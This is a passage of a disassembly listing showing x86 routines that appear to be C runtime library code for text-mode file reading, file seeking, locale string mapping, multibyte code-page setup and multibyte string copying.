and al, 0FBh
loc_41C340: ; CODE XREF: sub_41C251+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41C423
loc_41C358: ; CODE XREF: sub_41C251+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41C413
cmp al, 0Dh
jz short loc_41C374
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41C405
; ---------------------------------------------------------------------------
loc_41C374: ; CODE XREF: sub_41C251+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41C392
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41C389
add [ebp+arg_8], 2
jmp short loc_41C3E7
; ---------------------------------------------------------------------------
loc_41C389: ; CODE XREF: sub_41C251+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41C405
; ---------------------------------------------------------------------------
loc_41C392: ; CODE XREF: sub_41C251+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_421068 ; ReadFile
test eax, eax
jnz short loc_41C3BA
call dword_421088 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41C401
loc_41C3BA: ; CODE XREF: sub_41C251+15D�j
cmp [ebp+var_C], 0
jz short loc_41C401
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41C3DC
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41C3E7
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41C405
; ---------------------------------------------------------------------------
loc_41C3DC: ; CODE XREF: sub_41C251+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41C3EC
cmp [ebp+var_1], 0Ah
jnz short loc_41C3EC
loc_41C3E7: ; CODE XREF: sub_41C251+136�j
; sub_41C251+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41C404
; ---------------------------------------------------------------------------
loc_41C3EC: ; CODE XREF: sub_41C251+18E�j
; sub_41C251+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41C447
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41C405
loc_41C401: ; CODE XREF: sub_41C251+167�j
; sub_41C251+16D�j
mov byte ptr [edi], 0Dh
loc_41C404: ; CODE XREF: sub_41C251+199�j
inc edi
loc_41C405: ; CODE XREF: sub_41C251+11E�j
; sub_41C251+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41C358
jmp short loc_41C423
; ---------------------------------------------------------------------------
loc_41C413: ; CODE XREF: sub_41C251+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41C423
or al, 2
mov [esi], al
loc_41C423: ; CODE XREF: sub_41C251+101�j
; sub_41C251+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41C429: ; CODE XREF: sub_41C251+DA�j
mov eax, [ebp+var_8]
jmp short loc_41C442
; ---------------------------------------------------------------------------
loc_41C42E: ; CODE XREF: sub_41C251+12�j
; sub_41C251+39�j
and dword_46BB08, 0
mov dword_46BB04, 9
loc_41C43F: ; CODE XREF: sub_41C251+AB�j
; sub_41C251+C3�j
or eax, 0FFFFFFFFh
loc_41C442: ; CODE XREF: sub_41C251+B7�j
; sub_41C251+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C251 endp
; =============== S U B R O U T I N E =======================================
sub_41C447 proc near ; CODE XREF: sub_416CDE+67�p
; sub_417C57+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_46CF20
push esi
push edi
jnb short loc_41C4C9
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:46CE20h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41C4C9
push eax
call sub_41DD62
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41C48B
mov dword_46BB04, 9
jmp short loc_41C4DA
; ---------------------------------------------------------------------------
loc_41C48B: ; CODE XREF: sub_41C447+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call dword_4210AC ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41C4AB
call dword_421088 ; RtlGetLastWin32Error
jmp short loc_41C4AD
; ---------------------------------------------------------------------------
loc_41C4AB: ; CODE XREF: sub_41C447+5A�j
xor eax, eax
loc_41C4AD: ; CODE XREF: sub_41C447+62�j
test eax, eax
jz short loc_41C4BA
push eax
call sub_41CE74
pop ecx
jmp short loc_41C4DA
; ---------------------------------------------------------------------------
loc_41C4BA: ; CODE XREF: sub_41C447+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41C4DD
; ---------------------------------------------------------------------------
loc_41C4C9: ; CODE XREF: sub_41C447+D�j
; sub_41C447+2A�j
and dword_46BB08, 0
mov dword_46BB04, 9
loc_41C4DA: ; CODE XREF: sub_41C447+42�j
; sub_41C447+71�j
or eax, 0FFFFFFFFh
loc_41C4DD: ; CODE XREF: sub_41C447+80�j
pop edi
pop esi
pop ebx
retn
sub_41C447 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C4E1 proc near ; CODE XREF: sub_416CDE+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41C4FD
mov [edi+4], ebx
loc_41C4FD: ; CODE XREF: sub_41C4E1+17�j
push 1
push ebx
push esi
call sub_41C447
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41C56B
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41C522
sub eax, [edi+4]
jmp loc_41C634
; ---------------------------------------------------------------------------
loc_41C522: ; CODE XREF: sub_41C4E1+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41C55C
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, dword_46CE20[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41C573
mov edx, ecx
loc_41C54D: ; CODE XREF: sub_41C4E1+79�j
cmp edx, eax
jnb short loc_41C573
cmp byte ptr [edx], 0Ah
jnz short loc_41C559
inc [ebp+var_8]
loc_41C559: ; CODE XREF: sub_41C4E1+73�j
inc edx
jmp short loc_41C54D
; ---------------------------------------------------------------------------
loc_41C55C: ; CODE XREF: sub_41C4E1+50�j
test dl, 80h
jnz short loc_41C573
mov dword_46BB04, 16h
loc_41C56B: ; CODE XREF: sub_41C4E1+2D�j
or eax, 0FFFFFFFFh
jmp loc_41C634
; ---------------------------------------------------------------------------
loc_41C573: ; CODE XREF: sub_41C4E1+68�j
; sub_41C4E1+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41C581
mov eax, [ebp+var_8]
jmp loc_41C634
; ---------------------------------------------------------------------------
loc_41C581: ; CODE XREF: sub_41C4E1+96�j
test byte ptr [edi+0Ch], 1
jz loc_41C62C
mov edx, [edi+4]
test edx, edx
jnz short loc_41C59A
and [ebp+var_8], edx
jmp loc_41C62C
; ---------------------------------------------------------------------------
loc_41C59A: ; CODE XREF: sub_41C4E1+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:46CE20h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41C626
push 2
push 0
push [ebp+var_C]
call sub_41C447
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41C5ED
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_41C5D8: ; CODE XREF: sub_41C4E1+104�j
cmp eax, ecx
jnb short loc_41C5E7
cmp byte ptr [eax], 0Ah
jnz short loc_41C5E4
inc [ebp+arg_0]
loc_41C5E4: ; CODE XREF: sub_41C4E1+FE�j
inc eax
jmp short loc_41C5D8
; ---------------------------------------------------------------------------
loc_41C5E7: ; CODE XREF: sub_41C4E1+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41C621
; ---------------------------------------------------------------------------
loc_41C5ED: ; CODE XREF: sub_41C4E1+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41C447
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41C614
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41C614
test ch, 4
jz short loc_41C617
loc_41C614: ; CODE XREF: sub_41C4E1+124�j
; sub_41C4E1+12C�j
mov eax, [edi+18h]
loc_41C617: ; CODE XREF: sub_41C4E1+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41C621: ; CODE XREF: sub_41C4E1+10A�j
jz short loc_41C626
inc [ebp+arg_0]
loc_41C626: ; CODE XREF: sub_41C4E1+D9�j
; sub_41C4E1:loc_41C621�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41C62C: ; CODE XREF: sub_41C4E1+A4�j
; sub_41C4E1+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41C634: ; CODE XREF: sub_41C4E1+3C�j
; sub_41C4E1+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C4E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C639 proc near ; CODE XREF: sub_417033+A3�p
; sub_41B539+A5�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4218A8
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_46BB90, edi
jnz short loc_41C6AF
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4218A0
mov esi, 100h
push esi
push edi
call dword_421194 ; LCMapStringW
test eax, eax
jz short loc_41C68D
mov dword_46BB90, ebx
jmp short loc_41C6AF
; ---------------------------------------------------------------------------
loc_41C68D: ; CODE XREF: sub_41C639+4A�j
push edi
push edi
push ebx
push offset dword_43B668
push esi
push edi
call dword_421190 ; LCMapStringA
test eax, eax
jz loc_41C7C7
mov dword_46BB90, 2
loc_41C6AF: ; CODE XREF: sub_41C639+2E�j
; sub_41C639+52�j
cmp [ebp+arg_C], edi
jle short loc_41C6C4
push [ebp+arg_C]
push [ebp+arg_8]
call sub_420396
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41C6C4: ; CODE XREF: sub_41C639+79�j
mov eax, dword_46BB90
cmp eax, 2
jnz short loc_41C6EB
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_421190 ; LCMapStringA
jmp loc_41C7C9
; ---------------------------------------------------------------------------
loc_41C6EB: ; CODE XREF: sub_41C639+93�j
cmp eax, 1
jnz loc_41C7C7
cmp [ebp+arg_18], edi
jnz short loc_41C701
mov eax, dword_46BBAC
mov [ebp+arg_18], eax
loc_41C701: ; CODE XREF: sub_41C639+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_421064 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41C7C7
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_415B90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C75C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41C75C: ; CODE XREF: sub_41C639+10E�j
cmp [ebp+var_24], edi
jz short loc_41C7C7
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_421064 ; MultiByteToWideChar
test eax, eax
jz short loc_41C7C7
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_421194 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41C7C7
test byte ptr [ebp+arg_4+1], 4
jz short loc_41C7DB
cmp [ebp+arg_14], edi
jz loc_41C856
cmp esi, [ebp+arg_14]
jg short loc_41C7C7
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_421194 ; LCMapStringW
test eax, eax
jnz loc_41C856
loc_41C7C7: ; CODE XREF: sub_41C639+66�j
; sub_41C639+B5�j ...
xor eax, eax
loc_41C7C9: ; CODE XREF: sub_41C639+AD�j
; sub_41C639+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C7DB: ; CODE XREF: sub_41C639+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_415B90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C80F
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41C80F: ; CODE XREF: sub_41C639+1C2�j
cmp ebx, edi
jz short loc_41C7C7
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_421194 ; LCMapStringW
test eax, eax
jz short loc_41C7C7
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41C836
push edi
push edi
jmp short loc_41C83C
; ---------------------------------------------------------------------------
loc_41C836: ; CODE XREF: sub_41C639+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41C83C: ; CODE XREF: sub_41C639+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_421138 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41C7C7
loc_41C856: ; CODE XREF: sub_41C639+165�j
; sub_41C639+188�j
mov eax, esi
jmp loc_41C7C9
sub_41C639 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C85D proc near ; CODE XREF: sub_41CC21+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41C9F6 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_46CF24
mov [ebp+arg_0], esi
jz loc_41C9EA
xor ebx, ebx
cmp esi, ebx
jz loc_41C9E0
xor edx, edx
mov eax, offset dword_43A790
loc_41C891: ; CODE XREF: sub_41C85D+41�j
cmp [eax], esi
jz short loc_41C907
add eax, 30h
inc edx
cmp eax, offset dword_43A880
jl short loc_41C891
lea eax, [ebp+var_18]
push eax
push esi
call dword_421198 ; GetCPInfo
cmp eax, 1
jnz loc_41C9D8
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_46D040
cmp [ebp+var_18], 1
mov dword_46CF24, esi
rep stosd
stosb
mov dword_46D144, ebx
jbe loc_41C9C6
cmp [ebp+var_12], 0
jz loc_41C99C
lea ecx, [ebp+var_11]
loc_41C8E4: ; CODE XREF: sub_41C85D+139�j
mov dl, [ecx]
test dl, dl
jz loc_41C99C
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41C8F5: ; CODE XREF: sub_41C85D+A8�j
cmp eax, edx
ja loc_41C990
or byte_46D041[eax], 4
inc eax
jmp short loc_41C8F5
; ---------------------------------------------------------------------------
loc_41C907: ; CODE XREF: sub_41C85D+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_46D040
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_43A7A0[esi]
loc_41C923: ; CODE XREF: sub_41C85D+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41C956
loc_41C92A: ; CODE XREF: sub_41C85D+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41C956
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41C94F
mov edx, [ebp+var_4]
mov dl, byte_43A788[edx]
loc_41C944: ; CODE XREF: sub_41C85D+F0�j
or byte_46D041[eax], dl
inc eax
cmp eax, edi
jbe short loc_41C944
loc_41C94F: ; CODE XREF: sub_41C85D+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41C92A
loc_41C956: ; CODE XREF: sub_41C85D+CB�j
; sub_41C85D+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41C923
mov eax, [ebp+arg_0]
mov dword_46CF3C, 1
push eax
mov dword_46CF24, eax
call sub_41CA40
lea esi, dword_43A794[esi]
mov edi, offset dword_46CF30
movsd
movsd
pop ecx
mov dword_46D144, eax
movsd
jmp short loc_41C9E5
; ---------------------------------------------------------------------------
loc_41C990: ; CODE XREF: sub_41C85D+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41C8E4
loc_41C99C: ; CODE XREF: sub_41C85D+7E�j
; sub_41C85D+8B�j
push 1
pop eax
loc_41C99F: ; CODE XREF: sub_41C85D+14F�j
or byte_46D041[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41C99F
push esi
call sub_41CA40
pop ecx
mov dword_46D144, eax
mov dword_46CF3C, 1
jmp short loc_41C9CC
; ---------------------------------------------------------------------------
loc_41C9C6: ; CODE XREF: sub_41C85D+74�j
mov dword_46CF3C, ebx
loc_41C9CC: ; CODE XREF: sub_41C85D+167�j
xor eax, eax
mov edi, offset dword_46CF30
stosd
stosd
stosd
jmp short loc_41C9E5
; ---------------------------------------------------------------------------
loc_41C9D8: ; CODE XREF: sub_41C85D+51�j
cmp dword_46BBB4, ebx
jz short loc_41C9EE
loc_41C9E0: ; CODE XREF: sub_41C85D+27�j
call sub_41CA73
loc_41C9E5: ; CODE XREF: sub_41C85D+131�j
; sub_41C85D+179�j
call sub_41CA9C
loc_41C9EA: ; CODE XREF: sub_41C85D+1D�j
xor eax, eax
jmp short loc_41C9F1
; ---------------------------------------------------------------------------
loc_41C9EE: ; CODE XREF: sub_41C85D+181�j
or eax, 0FFFFFFFFh
loc_41C9F1: ; CODE XREF: sub_41C85D+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C85D endp
; =============== S U B R O U T I N E =======================================
sub_41C9F6 proc near ; CODE XREF: sub_41C85D+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_46BBB4, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41CA16
mov dword_46BBB4, 1
jmp dword_4211A0
; ---------------------------------------------------------------------------
loc_41CA16: ; CODE XREF: sub_41C9F6+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41CA2B
mov dword_46BBB4, 1
jmp dword_42119C
; ---------------------------------------------------------------------------
loc_41CA2B: ; CODE XREF: sub_41C9F6+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41CA3F
mov eax, dword_46BBAC
mov dword_46BBB4, 1
locret_41CA3F: ; CODE XREF: sub_41C9F6+38�j
retn
sub_41C9F6 endp
; =============== S U B R O U T I N E =======================================
sub_41CA40 proc near ; CODE XREF: sub_41C85D+118�p
; sub_41C85D+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41CA6D
sub eax, 4
jz short loc_41CA67
sub eax, 0Dh
jz short loc_41CA61
dec eax
jz short loc_41CA5B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41CA5B: ; CODE XREF: sub_41CA40+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41CA61: ; CODE XREF: sub_41CA40+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41CA67: ; CODE XREF: sub_41CA40+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41CA6D: ; CODE XREF: sub_41CA40+9�j
mov eax, 411h
retn
sub_41CA40 endp
; =============== S U B R O U T I N E =======================================
sub_41CA73 proc near ; CODE XREF: sub_41C85D:loc_41C9E0�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_46D040
rep stosd
stosb
xor eax, eax
mov edi, offset dword_46CF30
mov dword_46CF24, eax
mov dword_46CF3C, eax
mov dword_46D144, eax
stosd
stosd
stosd
pop edi
retn
sub_41CA73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA9C proc near ; CODE XREF: sub_41C85D:loc_41C9E5�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_46CF24
call dword_421198 ; GetCPInfo
cmp eax, 1
jnz loc_41CBD5
xor eax, eax
mov esi, 100h
loc_41CAC6: ; CODE XREF: sub_41CA9C+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41CAC6
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41CB17
push ebx
push edi
lea edx, [ebp+var_D]
loc_41CAE5: ; CODE XREF: sub_41CA9C+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41CB0C
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41CB0C: ; CODE XREF: sub_41CA9C+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41CAE5
pop edi
pop ebx
loc_41CB17: ; CODE XREF: sub_41CA9C+42�j
push 0
lea eax, [ebp+var_514]
push dword_46D144
push dword_46CF24
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41DA93
push 0
lea eax, [ebp+var_214]
push dword_46CF24
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_46D144
call sub_41C639
push 0
lea eax, [ebp+var_314]
push dword_46CF24
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_46D144
call sub_41C639
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41CB92: ; CODE XREF: sub_41CA9C+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41CBB0
or byte_46D041[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41CBA8: ; CODE XREF: sub_41CA9C+127�j
mov byte_46CF40[eax], dl
jmp short loc_41CBCC
; ---------------------------------------------------------------------------
loc_41CBB0: ; CODE XREF: sub_41CA9C+FC�j
test dl, 2
jz short loc_41CBC5
or byte_46D041[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41CBA8
; ---------------------------------------------------------------------------
loc_41CBC5: ; CODE XREF: sub_41CA9C+117�j
and byte_46CF40[eax], 0
loc_41CBCC: ; CODE XREF: sub_41CA9C+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41CB92
jmp short loc_41CC1E
; ---------------------------------------------------------------------------
loc_41CBD5: ; CODE XREF: sub_41CA9C+1D�j
xor eax, eax
mov esi, 100h
loc_41CBDC: ; CODE XREF: sub_41CA9C+180�j
cmp eax, 41h
jb short loc_41CBFA
cmp eax, 5Ah
ja short loc_41CBFA
or byte_46D041[eax], 10h
mov cl, al
add cl, 20h
loc_41CBF2: ; CODE XREF: sub_41CA9C+174�j
mov byte_46CF40[eax], cl
jmp short loc_41CC19
; ---------------------------------------------------------------------------
loc_41CBFA: ; CODE XREF: sub_41CA9C+143�j
; sub_41CA9C+148�j
cmp eax, 61h
jb short loc_41CC12
cmp eax, 7Ah
ja short loc_41CC12
or byte_46D041[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41CBF2
; ---------------------------------------------------------------------------
loc_41CC12: ; CODE XREF: sub_41CA9C+161�j
; sub_41CA9C+166�j
and byte_46CF40[eax], 0
loc_41CC19: ; CODE XREF: sub_41CA9C+15C�j
inc eax
cmp eax, esi
jb short loc_41CBDC
loc_41CC1E: ; CODE XREF: sub_41CA9C+137�j
pop esi
leave
retn
sub_41CA9C endp
; =============== S U B R O U T I N E =======================================
sub_41CC21 proc near ; CODE XREF: sub_41D05F+9�p
; sub_41D0B7+D�p ...
cmp dword_46D174, 0
jnz short locret_41CC3C
push 0FFFFFFFDh
call sub_41C85D
pop ecx
mov dword_46D174, 1
locret_41CC3C: ; CODE XREF: sub_41CC21+7�j
retn
sub_41CC21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC3D proc near ; CODE XREF: sub_4171E8+2B�p
; sub_4171E8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_46CF3C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41CC61
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_416BE0
add esp, 0Ch
jmp short loc_41CCC4
; ---------------------------------------------------------------------------
loc_41CC61: ; CODE XREF: sub_41CC3D+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41CCA6
mov ecx, [ebp+arg_4]
loc_41CC6C: ; CODE XREF: sub_41CC3D+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_46D041[esi], 4
mov [edi], al
jz short loc_41CC90
inc edi
inc ecx
test edx, edx
jz short loc_41CC9C
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41CCA2
jmp short loc_41CC96
; ---------------------------------------------------------------------------
loc_41CC90: ; CODE XREF: sub_41CC3D+3E�j
inc edi
inc ecx
test al, al
jz short loc_41CCA6
loc_41CC96: ; CODE XREF: sub_41CC3D+51�j
test edx, edx
jnz short loc_41CC6C
jmp short loc_41CCA6
; ---------------------------------------------------------------------------
loc_41CC9C: ; CODE XREF: sub_41CC3D+44�j
and byte ptr [edi-1], 0
jmp short loc_41CCA6
; ---------------------------------------------------------------------------
loc_41CCA2: ; CODE XREF: sub_41CC3D+4F�j
and byte ptr [edi-2], 0
loc_41CCA6: ; CODE XREF: sub_41CC3D+2A�j
; sub_41CC3D+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41CCC1
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41CCC1: ; CODE XREF: sub_41CC3D+6F�j
mov eax, [ebp+arg_0]
loc_41CCC4: ; CODE XREF: sub_41CC3D+22�j
pop edi
pop ebp
retn
sub_41CC3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCC7 proc near ; CODE XREF: sub_41761F+A2�p
; sub_417C57+95�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_46CF20
push esi
push edi
jnb loc_41CE5B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:46CE20h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41CE5B
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41CD18
loc_41CD11: ; CODE XREF: sub_41CCC7+177�j
xor eax, eax
jmp loc_41CE6F
; ---------------------------------------------------------------------------
loc_41CD18: ; CODE XREF: sub_41CCC7+48�j
test al, 20h
jz short loc_41CD28
push 2
push edi
push ecx
call sub_41C447
add esp, 0Ch
loc_41CD28: ; CODE XREF: sub_41CCC7+53�j
mov eax, [ebx]
add eax, esi
